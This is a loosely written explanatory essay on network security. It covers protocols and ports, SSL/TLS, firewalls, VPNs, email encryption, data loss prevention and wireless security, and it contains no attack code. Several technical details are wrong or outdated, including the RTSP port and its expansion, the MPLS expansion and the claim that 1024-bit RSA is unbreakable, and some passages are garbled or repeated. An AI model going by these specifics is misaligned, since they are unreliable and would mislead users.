Network Security:
1. How does it works?
When a single computer connects to the
other computer in network for data exchange it becomes member of computer
network. Computer network is made up of number of different computer and
components. There are different type of computer networks like LAN, WAN, MAN,
ETHERNET, Fibre Optic etc. It runs on different communication protocol. An end
user can connect to World Wide Web using internet connectivity. For that end
user first connects to Area ISP (Internet Service Provider) and after providing
their login details it connects to the web.
2. How do we get benefited?
When net communication happens there
are chances of different type of damages and losses happens to the network.
Network security ensures and prevent this type of losses and provides solution
to prevent and minimise the damages to the network. Network security monitors
communication and connectivity runs throughout the network. Also it looks for
Data flow control, speed control, Timing and error free communication. For that
security software applies different checksum and algorithms.
There could be Data loss, Connectivity
loss, loss due to failure of hardware and software. As soon we overcome this
basic situation, we secure fast, reliable & error proof computer network.
3. Types of Network Security:
Network
security problems can be divided roughly into four closely intertwined areas:
secrecy, authentication, nonrepudiation, and integrity control. There are different kind
of networks as we mentioned, so as different kind and level of security we
requires for the network. Security we require within and outside network for
inbound and outbound data movements. Also when we are connected to the internet
we require online security of our system and connectivity.
Network Access Control
Network Access Control is about user’s
login to network and exploring the resources of network. For that user have to
go through secured login process and their credential in detail. We require
some of following network protocols while accessing network resources like,
Protocol
Use
20, 21 FTP File transfer
22 SSH Remote login, replacement for
Telnet
25 SMTP Email: Simple Mail Transfer
Protocol
80 HTTP World Wide Web: Hyper Text
Transfer Protocol
110 POP-3 Remote email access: Post office
Protocol Version 3
143 IMAP Remote email access Internet Message
Access Protocol
443 HTTPS Secure Web (HTTP over SSL/TLS)
543 RTSP Media player control: Remote
Transfer Server Protocol
631 IPP
Printer sharing
SSL/TLS:
SECURE SOCKETS LAYER/TRANSPORT LAYER SECURITY
SSL builds
a secure connection between two sockets, including
1.
Parameter negotiation between client and server.
2.
Authentication of the server by the client.
3.
Secret communication.
4.
Data integrity protection.
So
using the secured protocols we can allow or restrict network resource’s access
to user. We can restrict hackers attempt for data hacking, program
interrupting, Network attacking etc. And so this way we can secure our Banking
and Financial organization, Atomic and Space Premises, Scientific Laboratories
etc.
b. Antivirus and Anti malware software
Antivirus is only a computer generated
specific program like other computer programs. Which allows routine program
functioning properly without any errors. It removes unwanted harmful data bytes
and malware bytes from functioning which causes disturbances not only to
program software but also to operating system. Antivirus programs follows
strict routine, it could be while system boots up for first time or
periodically on fix time routine. It finds out bad bytes and delete its
registry, remove it thoroughly from the system.
Antivirus program provides protection
against Malware, Spyware, Theft, Intrusion and Ransomware. Also it provides
parental guidance security for students. This kind of security available for
Offline as well for online systems.
c. Application security
When we concern about Application
Security in Network, it starts with what kind of network it is serving. Because
the network is wide spread made of different smaller network inside of it. Also
it growing rapidly. So application is driving force to the data flow through
the network. So its functionality and availability at particular time is real
issue to deal with. Because today all the network is application oriented and
application dependent. In early days data resource was accessed from local data
base like LAN network. But now a day’s network has become more complicated and
same data base is access from number of resources. So the same data base should
available to different resource at the same time. So the dedicated application
which can avail all the data resources at the same time should be there, on
both the end i.e. client & server. So the new network architecture should
be able to adapt, manage and deploy the complicated application. So this
requirement prompting the transition from traditional network to software
defined network (SDN). Juniper Networks is
building network infrastructure that will enable organizations to effectively
make the transition to virtualized networks, while maintaining access to
existing data and applications and preserving investments in network hardware
infrastructure.
These days’ data centres are migrated
to cloud based infrastructure and so the applications used are cloud based
only. The single product sale consumes whole cloud network, which includes a
barcode marked product at sale terminal, which belongs to cloud base data
centre and card swiping POS machine which tally the financial data of consumer
with the store data centre which includes inventory and finance section. Also
company sales online. This way this infrastructure becomes three tier which
includes web front end, a business logic tier and backend data store. All
running on rack of servers. T
he multi-tiered nature of the applications required additional network services
ms to secure these applications. Which takes care of application security, its
functionality and availability.
d. Behavioural analytics
Behaviour of network should be very tactile
towards its compatibility and adaptability to a new environment. I.E. Computer hardware/software
devices & program added to the network. It should be quick responsive when
incompatible part or malicious software program is added to network. Which
discard it immediately. That way only balanced network maintained only.
There are multitier security concern
over network behaviour, which starts from higher end network products Like VSAT,
Mainframe computers, Servers, Routers, Modems, IPV4 & IPV6 devices to end
user computer. These components belongs to different network like LAN, WAN,
MAN, WIFI, FIBRE OPTIC, ETHERNET, CLOUD network. These networks runs over different network
communication protocols. Existing present network is only outcome of evolution.
The major issue of network is its global presence and which requires large
scale maintenance & care and its nature of expanding broad way. Which
raises its compatibility issue towards existing network. The smallest
incompatibility of cable can raise issue of communication malfunctioning
throughout the network.
In 21st century Network and
Datacentre belongs to private, Public, Corporate, Defence, Educational
Institution, Space organization or Scientific Laboratories migrates to Cloud
based network. When these networks migrate to Cloud based network, issues like
Data security, Data Integrity, Data Resource, Communication security, Cost Effectiveness
is raised. Both network existing one and Cloud based have to go through
compatibility issues which conclude behavioural analytics only.
e. Data loss prevention
Computer Network is made of number of
computer & network components. All they have common work function is
secured loss less data flow. Network administrator do everything to overcome
data loss problem. The data security requires multilevel counselling of network
representative who is actually responsible to answer the kind of data, where
data is traveling, type and level of data security breach should be stop. It includes different territory people belongs to
different service networks and of different hierarchy. They belongs to Seller
network and Buyer network and intermediate Service Provider network. In short
with General Data Protection System we can secure the data. And Assessing
security risks, Preventing attacks, Monitoring to detect breaches and Quality
of protection is key ingredients of protection system. By reducing access to
data by employing Privileged and Fine grained users where persons and purpose
oriented data access is carried out, we can protect data. Also minimize data
exposure we reduce chance of data loss. Data auditing can be fruitful to protect
data.
To prevent the communication and data
loss they employed various methods like Encryption of data to secure it from
Hecker. By employing data scramble and less links we can hide data partially.
So intentionally or accidentally we can make data less visible or invisible to
entity. They employ different communication protocols, algorithm, topologies to
prevent communication and data loss. They employ different transmission media
and methods to speed up the network communication and to overcome communication
loss. This way only we can obtain key security objectives. Three categories
assessment, detection and prevention can reduce data theft and data loss. The
data security should be inbuilt or by default in system and security should be
centralized and comprehensive throughout the system.
Threats to data base is arises from
some of entry points like Operating System, Database itself and applications.
So threats arises need no to be from outside, also people associated to the
organization can damage from inside of system through entry points. By locating
personal data to secure, by creating security profile and by employing
privileged users to data base we can secure the database perimeter. With data
masking and sub-setting the address of data we can edit the data base for
outside user to access. We provide them a copy of data base with tailored
personal details in database.
Thus by securing our data base
servers, application servers, data base firewalls, network encryptions,
gateways and other devices we can restrict the data loss.
f. Email security
E-mail is sent between two points.
When e-mail is sent over network it is go through various computers before
reaching to its destination. So various computer resources can read it. So it
is not secured communication way. To make it secure we should find out secured
way to handle it. By using PGP (Pretty Good Privacy) or S/MIME (Secure –
Multipurpose Internet Mail Extension) protocol we can secure e-mail between two
end points. I.E. Sender and Receiver.
PGP:
It is complete secure package for
e-mail which provides security measure for e-mail like, Authentication,
Privacy, Digital Signature and Compression. It is simple and open source, so
comes with source code and no price available on internet. It is available for
UNIX, LINUX, and WINDOWS & MAC OS.
PGP
encrypts data by using a block cipher called IDEA (International Data Encryption
Algorithm), which uses 128-bit keys. PGP supports four RSA key lengths. It is up
to the user to select the one that is most appropriate. The lengths
are:
1. Casual (384 bits): Can be broken easily today.
2. Commercial (512 bits): Breakable by three-letter organizations.
3.
Military (1024 bits): Not breakable by anyone on earth.
4.
Alien (2048 bits): Not breakable by anyone on other planets, either.
S/MIME:
It
provides Authentication, Data Integrity, Secrecy and Non- Repudiation. It also
is quite flexible, supporting a variety of cryptographic algorithms. Not
surprisingly, given the name, S/MIME integrates well with MIME, allowing all
kinds of messages to be protected. A variety of new MIME headers are defined.
g. Firewalls
There are number of computers added to
network every moment, in Corporate Houses, MNC’s, Government Organizations,
Educational Institutions, Defence Organizations, and Scientific Laboratories
etc. Adding of single new computer to network or LAN brings Virus or Bug
threats to whole network. Any single computer can be responsible to destroy the
whole network or LAN inside a company. Even IPSec cannot secure the bad bytes
entering the network. It has nothing to do with it.
Firewall system protection is nothing
but modern adaption of old medieval security standby. Digging a deep moat
around a castle. Everyone passes through in or out of castle has to pass
through a bridge where they inspected by I/O police. Same way in a company all
LANs connected arbitrary way but the inbound and out bound traffic is passes through
firewall only. Firewall is used as Packet Filter. Filter is designed with some
rules where which bytes should allow go in or out. Also a table entry for
source/destination location. Like TCP/IP protocol, where port number is
allotted in IP address. We can define particular port address with data packets
are allowed in or out to travel through firewall.
The other practice is like
implementing Demilitarized zone. Where web server is put outside secured LAN.
Then firewall is configured to block the requested data packets particular port
number. And now webserver’s request to contact particular port number is turned
down by firewall. This way firewall system is implemented. This is network
layer filter for firewalls. Firewall can see into transport and application
layer data for filtering. Where some peer to peer applications selects the port
dynamically to avoid easily being spotted. And this way firewall security
breach happens. So firewall has to see into data packets what they carry. And
firewall is entry level check point only, but each system belongs network
turned on their own firewall security.
Some time there is security breach
carried out not to steal data but for shutting down the network. It is called Denial
of Service (DOS) attack. Also there is Distributed Denial of Service attack is
carried out where number of already hacked computers attacks common target
computer. And in this case it is hard to find out attackers as they are
unsuspecting user.
h. Intrusion prevention system
Intrusion detection and prevention is
key ingredient of network security. In any network data availability, data
security and data flow defines the network efficiency. When it comes to data
security, it is bit or byte level. Security of data in various layers of OSI
model. Also different data security protocol e.g. IPSec and secure login
procedure like SSL/TLS is employed for entry point security. Where data
integrity and security with secure data communication between client and server
is carried out. This type of communication is carried out after secured
authentication only.
Also we design and define special firewall
system dedicated to intrusion prevention system. Where inbound and outbound
data traffic is checked at bit level. Data auditing is carried out with
operating system and system database. Alert is being issued to firewall system
by this kind of auditing system if malicious software is trying intrude the
database.
Also Data encryption, data encapsulation,
data scrambling and data hiding program is being employed. And data is assorted
in Public, Private and Protected class. That way we can restrict direct access
to the database. We partially hide data to end user. This kind of protection is necessary because
threat is not from only outside but people associated to the system also brings
or sends bad bytes through system. By enforcing privilege access level to priority
database. We have to develop the intrusion counter measure system. Where we
have to define the system rules and regulation. Also we can enforce penalties
to the responsible, engaging in unlawful and suspicious activities. These days
antivirus software is available which is capable handling malware byte, network
intrusion, data theft for domestic and commercial users. But when we talk about
large infrastructure we require security system is by default or within and
throughout the system comprehensively. A security module within a network
system.
I. Mobile device security
When we talk about mobile devices, as
their name they are identified with mobile network only. These devices can be
wireless Smart Cell phones, Smart Watches, Laptops, Printers, Telephony or
Gaming devices. They can be connected to network wirelessly with cell phone
network (3G/4G) or 802.11 Wi-Fi hotspot. Which is available at Malls, Theatres,
Stadium, Offices, and Institutions etc. So one can get online or stay connected
by staying away from home or offices. Where one is travel by Road, Air or Sea.
The Electronic Reader device downloads
daily Newspapers, subscribed newsletter and articles. Mobile devices are GPS
enabled and E-Cars and Taxi companies line UBER and other runs over Wi-Fi network
through mobile applications. Even parking meter payments done with Wi-Fi
enabled electronic parking meter. Today Web network becomes big online market
where every small and big companies are selling their products online with
Mobile Applications. We can order grocery through application. Even we can do
the payment and get the receipt for the payment. So with the Wi-Fi networks we
can do business, banking, financial transaction, stock purchase etc., in embedded system piece of computer hardware monitors
data of system like Air conditioner or Geyser and communicate with mobile phone
to turn it On/Off or update the status. In automation industry we can operate
and monitor the data of the system even when we are away from the system. Also Wi-Fi
network used in military and defence where single message or command can wedge
a war in fraction of seconds. So the security measures taken to survive with
this network is of very high level. We can track these device over network
using their IP address under IPV4 and IPV6 devices.
We have 2G/3G/4G mobile network and
with Wi-Fi hot spot for wireless communication. They are basically belongs to
Advanced Mobile Phone system (AMPS), Global System for Mobile communication (GSM),
Universal Mobile Telecommunication System (UMTS), General Packet Radio Services
(GPRS) , Long Term Evolution (LTE). Also Wi-Fi network like 802.11 and WiMAX
network (Worldwide Interoperability for Microwave Access) 802.16 (Broadband
Wireless). Which uses Orthogonal Frequency Division Multiple Access (OFDMA
802.16e mobile WiMAX, and OFDM 802.16a Fixed WiMAX). To speed up the communication Wi-Fi network
transmit four stream of data with four antennas at a time and can be managed at
receiver side using Multiple Input Multiple Out (MIMO) techniques Security
threat to these network arises as data transmitted through these devices can
easily receive by other computers. So using Wi-Fi Protected Access (WPA2)
advanced encrypted communication can be carried out. Using SSL/TLS, IPSec
protocol we can carry out authenticated secure communication. In earlier days of Web, there were simple web pages with web sites. Now
a days there are Java Applets, ActiveX control and JavaScript to download. So
be the security issues arises with the downloading and executing the mobile
application codes.
j. Network segmentation
Computer Network is made up of number
of network components. All the network has their own identity, work function,
priority, privilege and hierarchy. They all have role to play to make network
run. If we can differentiate network
inside of network then we can also identify network components inside of that
network. We can differentiate them to
bit or byte level data frames. We can call them Network Segments.
The environment of network segments changes
as network infrastructure changes. Networks segments have one common goal i.e.
speed up the data flow and error free data communication. And for that it is distributed
throughout the network for data processing. We have different kind of networks
like, Personal Area Network, Local Area Network, Wide Area Network,
Metropolitan Area Network, Internet network and Cloud base network. Among Cloud
base network is latest and state of art network infrastructure. Where each
Repeater, Hub, Bridge, Switch, Router and Gateway is network segments. Each of
this segment in network is well defined. Also different communication method is
employed. Like Ethernet, Fibre Optic, DSL, VSAT etc. Each of this communication
carried out with their own different communication protocols.
When it comes to cloud base
infrastructure there is basically three types of cloud services 1. Public 2.
Private and 3. Hybrid. Also three basic cloud service models are there. They
are 1. Software as Service (SaaS) 2. Platform as service (PaaS) and 3.
Infrastructure as service (IaaS). When we bring this infrastructure into
practice and start doing business it is very costly. Because here each of
segment or device belongs to network is charged on hourly basis for monthly
billing cycle. Where Each CPU is counted for the services. E.G. if we look for
IaaS, the network segment is Standard CPU and High speed CPU in virtual server,
and with virtual private server at least two host is required. Same way it is
employed for virtual server for SAP and Virtual private server for SAP. There
is Operating system, Middleware, Storage and Networking component or segments
are counted on hourly basis. Cloud service is very safe, secure and reliable
data communication infrastructure.
It is good each segment of network is
identical to each other. They have their own work definition. Due to network
segments this property only, network becomes self-sustain once configured. As
network is growing in nature, network maintenance & care is routine
requirement. All the future model of network is designed in such a manner they
can complement the existing network. They should be compatible. So each network
segment can become a key to define the future networks.
k. Security information and event management
Event Management in the context of
network security includes the securing data and data flow at particular point.
For securing network data we employ different algorithm, topologies, protocols and
communication media and methods. With modern equipment we implement layer based
communication. We employ the peer to peer communication. And so we have to
secure the data bit/byte level. We have to manage the event of data security
and data communication where actually it is carried out. That way only we can do
effective communication.
We have different communication
junction where we carry out communication like routers, switches, bridges,
tunnels, firewalls, gateways etc. So we are managing event ingredients like
protocols, algorithms, topologies etc. at particular node. We may have security
breach by intruder who can crack our data and to secure our data we have to
take counter measure at basic level. We have IPSec protocol which do have security
information in its frame header. Also using cryptography we can secure our
data. We have encryption key and decryption key at sender and receiver end. The
cipher text we transmit is being protected by these keys which have to change
every time we use cryptography. We have antivirus software which can provide
operating system level security.
As soon we draw a tunnel in
Metropolitan Area Network where a company is having corporate offices at
various location. Here office employee can stay in touch of office while he is
roaming. So secure data login through SSL/TLS is employed. With firewall we can
monitor inbound and outbound data and restrict unwanted data communication.
Thus security information and event
management is a key parameter to efficient network communication & data
protection.
l. VPN
The term VPN (Virtual Private Network)
is highlighted for its functionality and features available of network security
of Private Network while running over a Public Network. A private network is
made up of computers and dedicated communication Leased Line across the
company’s wide spread or global office network. Here data security is prime but
it is very costly. While in case of Virtual Private Network we design or
overlay our secured private network over a web or internet. I.E. Public Network
a network is made up of Firewalls, Tunnels, IPSec and ESP (Encapsulating Secure
payload) with Tunnels.
We can dig a Tunnel between pair of Firewalls
of office network. Where data has to pass through Firewalls Including services,
modes, algorithms and keys. When system turns on each Firewall have to
negotiate with the parameters of its SA. Using IPSec for Tunnelling we can
manage all aggregate traffic between pair of firewalls over single,
authenticated encrypted SA of office network. This provides integrity control,
secrecy and even considerable immunity for data analysis. Using IPSec followed
by IP in data frame separates data flowing through public network to a private
network.
The other feature is laying a VPN across
ISP network to pair of firewall point of office network. A network
administrator can configure and monitor the VPN gateways, while ISP
administrator configure MPLS (Multipoint Label Switching) path. Here VPN runs
over internet with completely isolated security software. Which is transparent
to all user software.
m. Web security
There are three major issues related
to Web Security.
1.
How are objects and resources named securely?
2.
How can secure and authenticated connections be established?
3.
What happens when Web site sends client executable codes?
Web security is major chaos in web
world. The problem arises with day to day expansion and upgradation of network.
Major corporate houses like Cisco, SAP, Oracle, Citrix etc., publishes
Whitepapers over the issue. They organizes Workshop and Seminars to overcome
the threat provided by the network invaders. They are called hackers and more
sophisticated word is Crackers. In their world they are more sophisticated
programmers or ingenious.
Threat they provide is like changing of
Web Pages of Web Sites, Slowing Down network traffic by flooding particular web
site over number of computer with data packets. They Spoof into secured data
base of the company, they crack the banking system codes and clear the account
balance, and they can be responsible for fall of stock prizes of company.
Area related to Web Security is, a.
Secure Naming b. DNS Spoofing c. DNSsec
Here DNSsec conceptually is extremely
simple and based on public key Cryptography. DNSsec offers fundamental
services.
1.
Proof of where the data originated
2.
Public key distribution
3.
Transaction and request authentication
Secure Sockets Layer (SSL)
After Secure Naming it is about secure
connection. Netscape Communication Corp. come up with SSL solution where
security of banking and financial data transaction is carried out. NETSCAPE,
MOZZILA, INTERNET EXPLORER is using SSL.
SSL build a secure connection between
two socket including
1.
Parameter negotiation between client and server
2.
Authentication of server by client
3.
Secret communication
4.
Data integrity protection
A browser uses SSL is going through
following layers.
Application
(HTTP)
Security
(SSL)
Transport
(TCP)
Network
(IP)
Data
link (PPP)
Physical
(modem, ADSL, cable TV)
TLS is
Transport Layer Security derived over SSL Version 3.
Mobile Code Security:
In
earlier days of Web, there were simple web pages with web sites. Now a days
there are Java Applets, ActiveX control and JavaScript to download. So be the
security issues arises with the downloading and executing the mobile
application codes.
Browser
Extension:
There
are Browser Extension, Add-ons and Plugins which provides the browser’s
Compatibility with applications like PDF, Flash animations etc. There could be
malicious software add-ons and plugins. They should be downloaded from trusted
sources only.
Virus:
Virus
is simple program which executes itself when it is called upon. It is unwanted
element come up with unreliable web applications, e-mail attachments or
malicious software program. When any application in system runs, next moment
control transfers to virus program. Which infects other applications like
e-mail and try to spread over other computer system. Some virus starts on
booting of computer and destroy the computer system. So now the OS are come up
with secure microkernels and tight compartmentalization of users, processes and
resources.
n. Wireless security
System we design with VPN and
Firewalls are secured ones. It provides enhance features of safe system. But
when it comes to Wireless communication the wireless system transmit Radio
packets right over fire wall in both direction. Wireless is snooper’s dream
come true. It is free data without having to do any work. There for wireless
system requires more security then wired systems.
Now 802.11 provides data link level
security. 802.11i‘s function is to prevent receiving or interfering
communication carried out by the another two nodes. It is also knows by its
trade name WPA2. I.E. WIFI Protected Access 2. Plain WPA is interim scheme that
implements subset of 802.11i. It should be avoided in favour of WPA2. 802.11i
is used for corporate network as well for home use. While it is used for
corporate use it is using client server application using 802.1x secure
protocol. We can check the client-server authentication using Extensible
Authentication Protocol. While we use 802.11i for home purpose we don’t use
server instead single password issued to client for authentication. This way
home use of 802.11i has less secured authentication and communication.
Bluetooth
Security
Bluetooth security can also be
breached. Bluetooth V2.1 on ward Bluetooth devices are protected with 4
security modes. It is starting from nothing to full data Integrity and
Encryption control. Before Bluetooth V2.1 arrive, new device to Bluetooth
allotted channel with predictable passcode like 1234 to enter in both devices.
Which was less secured and breakable. After Bluetooth V2.1 master slave device
allotted only a channel which is secured, integrity controlled and encrypted.
Before communication starts master/slave make sure there is no other device is
getting passkey.